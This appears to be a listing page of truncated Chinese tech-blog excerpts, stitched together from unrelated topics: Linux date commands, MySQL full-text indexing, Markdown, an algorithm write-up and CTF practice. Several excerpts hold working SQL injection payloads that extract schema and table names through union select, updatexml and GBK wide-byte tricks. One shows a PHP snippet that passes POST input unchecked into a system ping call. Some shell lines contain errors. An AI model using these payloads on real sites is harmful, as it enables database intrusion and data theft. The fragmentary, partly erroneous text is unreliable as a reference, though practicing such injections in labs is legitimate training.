双引号绕过 ?id=1" order by 3--+ ?id=1" and updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata limit 0,1),0x7e),1)--+ ?id=1" and updatexml(1,concat(0x7e,(select group_concat(table_name) from informat
linux操作系统获取时间的不同方式 #获取当前年份的第一个月 a=$(date -d"4 year ago" +%Y01) #获取下一个月 b=date -d "${a}"01" next month" +%Y%m #.直接获取当前时间的下个月 c=date -d"naxt month" +%Y%m #获取当前时间 d=date +%Y%m%d%H%m%s 或者 d=$(date +%Y%m%d%H%m
?id=-1") union select 1,2,group_concat(schema_name) from information_schema.schemata--+ ?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctftraining'--+ ?id=-1") union selec
?id=1') order by 3--+ ?id=-1') union select 1,2,3--+ ?id=-1') union select 1,database(),3--+ ?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+ ?id=-1'
$(date "+%Y.%m.%d") 获取年月日中间点分开 $(date "+%Y-%m-%d %H:%M:%S") 年月日时分秒 $(date "+%Y%m%d%H%M%S") 20220108160237 数字格式 第一句判断是否存在 文件 / 自动会到根目录 别忘记中括号后面得分号 ./ 文件名 即可执行 简单得备份文件思路 后续
前言 我们都知道 InnoDB 在模糊查询数据时使用 "%xx" 会导致索引失效,但有时需求就是如此,类似这样的需求还有很多,例如,搜索引擎需要根基用户数据的关键字进行全文查找,电子商务网站需要根据用户的查询条件,在可能需要在商品的详细介绍中进行查找,这些都不是B+树索引能很好完成的工作
#!/bin/bash #FTP数据采集脚本 T=`date -d yesterday +%Y%m%d`//获取昨天的日期,格式20220107 #T=`date -d +%Y%m%d`//获取今天的日期 #T=`date -d '1 day ago ' +%Y%m%d`//获取昨天的日期 #T=`date -d '2 day ago ' +%Y%m%d`//获取前天的日期 #T=`date -d '10 day ago ' +%Y%m%d
emacs org-mode导出文档的时候保留下划线 Grey 背景 这段时间开始尝试使用org-mode作为我的笔记系统,也做了一部分笔记。为了保证通用性,我最终都转成了word文档。最初以为这个就是一个靠谱转换不会遇到什么问题,但是今天转完最新的一份笔记之后自己打开看了一下,标题等信息出现了很
Markdown 源文件下载 / 链接未知本文固定链接 https://ericp.cn/cmd Cmd Markdown 公式指导手册 新增内容:戴帽符号修补内容:如何输入一个交换图表 / 在字符间加入空格 Ver. 2020-10-03 本文为 MathJax 在 Cmd Markdown 环境下的常用语法指引。Cmd Markdown 编辑阅读器支
date date:显示当前时间【年月日时分秒】 date +%[选项] Y:年 m:月 d:日 H:时 M:分 S:秒 date "+%Y-%m-%d":格式化显示,格式可自定。【当前按照“年-月-日”显示】 date -s "2020:12:12 20:20:20":将日期设置为2020-12-12 20:20:20 注:+不要遗漏 cal cal:显示当前日历
摘要 给定序列, 求有多少个区间满足 众数出现次数 \(>\lfloor (r-l+1)/2\rfloor\) 解 首先每个区间只会有一个数字. 关于数字 \(x\) 需要满足: \[2(s_r-s_l)>r-l+1 \]即 \[2s_r-r>2s_l-l \]令 \(p_i=2s_i-i\), 则对于 \(x\), 其 \(p_i\) 是 \(\mathrm{cnt}(x)+1\) 段等差数列: 不
shell脚本收藏 循环日期#!/usr/bin/env bash start_date="20210301" end_date="20211101" while [ "$start_date" -le "$end_date" ]; do stat_date=`date -d "$start_date" +%Y-%m-%d` echo $stat_date start_date=$(date
1.date 2.date +%F 等价于 date "+%Y-%m-%d" 3.date +%T 4.date "+%F %T" 等价于 date "+%F-%m-%d %H:%M:%S"
前言 我们都知道 InnoDB 在模糊查询数据时使用 "%xx" 会导致索引失效,但有时需求就是如此,类似这样的需求还有很多,例如,搜索引擎需要根基用户数据的关键字进行全文查找,电子商务网站需要根据用户的查询条件,在可能需要在商品的详细介绍中进行查找,这些都不是B+树索引能很好完成的工作
order by确定列数 id = 1' order by 5 --+ union确定匹配的列 id=0' union select 1,2,3 --+ 获取相应的用户名和数据库名 id=0' union select 1,user(),database() --+ group_contact()函数 GROUP_CONCAT(expr)该函数将非空列值按照分组条件进行合并并最终返回。如果有空值,则
Markdown学习 标题:一个#+空格+标题 标题 两个#+空格+标题(依次类推) 三级标题 字体 Hello,World 左右两个*号粗体 Hello,World 两边一个*号斜体 Hello,World 三个*斜体+粗 Hello,World 两个波浪号 引用 走向人生巅峰 >++引用 分割线 三个-分割线 三个*也是 图片 超链接 点击跳
MySQL 宽字节注入 1.宽字节诸如基础 GBK占用两字节 ASCII占用一字节 PHP中编码为GBK,函数执行添加的是ASCII编码,MySQL默认字符集是GBK等宽字节字符集。 %DF':会被PHP当中的addslashes函数转义为"%DF","“既URL里的“%5C”,那也就是说,“%DF”会被转成“%DF%5C%27”倘若网站的字符
题解 为啥我写个线段树还得调 1h 啊? 考虑枚举每一种颜色 \(c\)。设 \(S_i\) 为 \(a_{1\dots i}\) 中 \(c\) 的出现次数,那么一个区间 \((l,r]\) 是合法的当且仅当 \(2S_r-r>2S_l-l\)。设 \(f(x)=2S_x-x\)。按顺序枚举 \(c\) 的每一个出现位置,设这个位置为 \(p\),下一个出现位置为 \(
培训 WEB (略微提升) 1.exec BUU <?php if (isset($_POST['target'])) { system("ping -c 3 ".$_POST['target']); } ?> 2.SQL注入 BUU ?id=1' order by 3--+ ?id=-1' union select 1,database(),3--+ ?id=-1' union sel
数字型注入 用burpsuite进行抓包 发现变量为id,因为是字符型所以构造payload为 发现并没有报错,说明有两个字段 之后要获取显示位,使用union select 1,2去实验 发现1和2都回显了 在1或者2上面构造payload 按照下面的步骤来进行注入: 获取数据库: union select 1,group_concat(schem
永久修改: sudo echo "export TIME_STYLE='+%Y-%m-%d %H:%M:%S'" >> /etc/profile && source /etc/profile
PWN入门系列(2) 栈溢出 栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的栈中的变量的值被改变(覆盖)。是一种特定的缓冲区溢出漏洞,类似的还有heap、bss溢出等。其前提是: · 程序必须向栈上写入数据程序对某个函数或者某个模块
目录 一:日期 获取当前日期时间 格式化日期时间 加减日期时间 二:重定向 1:定义 2:使用方法 三:定时器 1:格式 2:用法 一:日期 获取当前日期时间 date +"%Y-%m-%d %H:%M:%S" 格式化日期时间 date -d today +"%Y-%m-%d %H:%M:%S" 加减日期时间 date +%Y%m%d //显示年月日 date +%Y%m%d
MySQL环境下 #使用st数据库 Mysql>use st #查询student表里的数据,显示所有字段的数据 mysql> select * from student; ±----------±-------±-----±-----±------+ | Sno | Sname | Ssex | Sage | Sdept | ±----------±-------±-----±-----±------+ | 201215121 | 李
时间日期类 Date指令—显示当前日期 基本语法 (1) date(功能描述:显示当前时间) (2) date +%Y(功能描述:显示当前年份) (3) date +%m(功能描述:显示当前月) (4) date +%d(功能描述:显示当前是哪一天) (5) date “+%Y-%m-%d %#:%m:%s”(功